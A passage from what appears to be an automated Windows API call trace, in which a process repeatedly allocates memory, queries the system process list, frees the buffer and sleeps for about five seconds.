Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.613] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.621] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.628] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.635] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.644] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.650] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.657] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.664] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.672] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.680] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.687] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.694] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.700] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.707] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.716] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.726] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.739] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.748] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.756] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.763] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.770] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) 